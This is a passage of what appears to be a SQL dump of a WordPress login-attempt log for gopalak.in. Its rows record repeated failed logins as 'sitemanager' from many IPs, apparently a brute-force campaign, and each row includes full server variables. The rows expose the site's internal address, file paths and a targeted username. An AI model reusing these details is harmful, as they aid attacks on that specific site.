Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53934\";s:11:\"REMOTE_ADDR\";s:12:\"198.54.120.4\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746034563.2762611;s:12:\"REQUEST_TIME\";i:1746034563;}}','198.54.120.4',0,'2025-04-30 23:06:05','1970-01-01 00:00:00'),(94593,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"hu-HU,hu;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39064\";s:11:\"REMOTE_ADDR\";s:14:\"78.155.192.110\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746034905.5081949;s:12:\"REQUEST_TIME\";i:1746034905;}}','78.155.192.110',0,'2025-04-30 23:11:47','1970-01-01 00:00:00'),(94594,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"55024\";s:11:\"REMOTE_ADDR\";s:14:\"18.210.253.149\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746035245.1167381;s:12:\"REQUEST_TIME\";i:1746035245;}}','18.210.253.149',0,'2025-04-30 23:17:27','1970-01-01 00:00:00'),(94595,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37270\";s:11:\"REMOTE_ADDR\";s:13:\"66.102.128.22\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746035918.360208;s:12:\"REQUEST_TIME\";i:1746035918;}}','66.102.128.22',0,'2025-04-30 23:28:40','1970-01-01 00:00:00'),(94596,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"cs-CZ,cs;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.102 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42114\";s:11:\"REMOTE_ADDR\";s:13:\"49.12.169.164\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746036254.66359;s:12:\"REQUEST_TIME\";i:1746036254;}}','49.12.169.164',0,'2025-04-30 23:34:16','1970-01-01 00:00:00'),(94597,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:127.0) Gecko/20100101 Firefox/127.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"57130\";s:11:\"REMOTE_ADDR\";s:13:\"15.204.43.173\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746036592.551399;s:12:\"REQUEST_TIME\";i:1746036592;}}','15.204.43.173',0,'2025-04-30 23:39:54','1970-01-01 00:00:00'),(94598,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"39790\";s:11:\"REMOTE_ADDR\";s:14:\"162.213.251.49\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746036927.8079979;s:12:\"REQUEST_TIME\";i:1746036927;}}','162.213.251.49',0,'2025-04-30 23:45:29','1970-01-01 00:00:00'),(94599,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47062\";s:11:\"REMOTE_ADDR\";s:14:\"188.165.54.175\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746037259.0767181;s:12:\"REQUEST_TIME\";i:1746037259;}}','188.165.54.175',0,'2025-04-30 23:51:00','1970-01-01 00:00:00'),(94600,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52838\";s:11:\"REMOTE_ADDR\";s:13:\"103.110.84.40\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746037583.6634679;s:12:\"REQUEST_TIME\";i:1746037583;}}','103.110.84.40',0,'2025-04-30 23:56:25','1970-01-01 00:00:00'),(94601,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"40528\";s:11:\"REMOTE_ADDR\";s:15:\"103.179.190.244\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746037910.3340499;s:12:\"REQUEST_TIME\";i:1746037910;}}','103.179.190.244',0,'2025-05-01 00:01:52','1970-01-01 00:00:00'),(94602,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"103\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56996\";s:11:\"REMOTE_ADDR\";s:13:\"167.86.74.244\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746038235.8513701;s:12:\"REQUEST_TIME\";i:1746038235;}}','167.86.74.244',0,'2025-05-01 00:07:17','1970-01-01 